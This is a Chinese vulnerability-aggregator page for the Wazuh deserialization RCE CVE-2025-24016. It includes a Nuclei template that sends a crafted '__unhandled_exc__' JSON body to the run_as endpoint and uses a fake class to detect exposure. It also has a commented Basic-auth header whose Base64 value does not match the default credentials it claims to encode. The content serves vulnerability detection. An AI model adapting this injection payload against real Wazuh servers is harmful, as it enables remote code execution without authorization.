POC详情: c4d655b54017657fc1205124fb7ca047d8a29c91

来源
关联漏洞
标题: Wazuh服务器远程代码执行漏洞 (CVE-2025-24016)
描述:Wazuh是一款用于威胁预防、检测和响应的免费开源平台。在版本4.4.0至4.9.1之间的Wazuh服务器中,存在一个不安全的反序列化漏洞,允许远程代码执行。DistributedAPI参数被序列化为JSON,并通过`as_wazuh_object`(位于`framework/wazuh/core/cluster/common.py`)进行反序列化。如果攻击者成功在DAPI请求/响应中注入未经检查的字典,他们可以伪造一个未处理的异常(`__unhandled_exc__`),从而执行任意Python代码。该漏洞可以通过任何拥有API访问权限的人(被攻破的控制台或集群中的Wazuh服务器)触发,在某些配置下,甚至可以通过被攻破的代理触发。版本4.9.1中已经修复了该漏洞。
介绍
# CVE-2025-24016 Wazuh Unsafe Deserialization RCE Detection

This repository contains a Nuclei template to detect the unsafe deserialization vulnerability in Wazuh servers, identified as **CVE-2025-24016**.

## Template Details

```yaml
id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"
```

## Usage

```bash
nuclei -t CVE-2025-24016.yaml -u http://example.com
```

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
文件快照

[4.0K] /data/pocs/c4d655b54017657fc1205124fb7ca047d8a29c91 ├── [1.3K] CVE-2025-24016.yaml └── [1.8K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。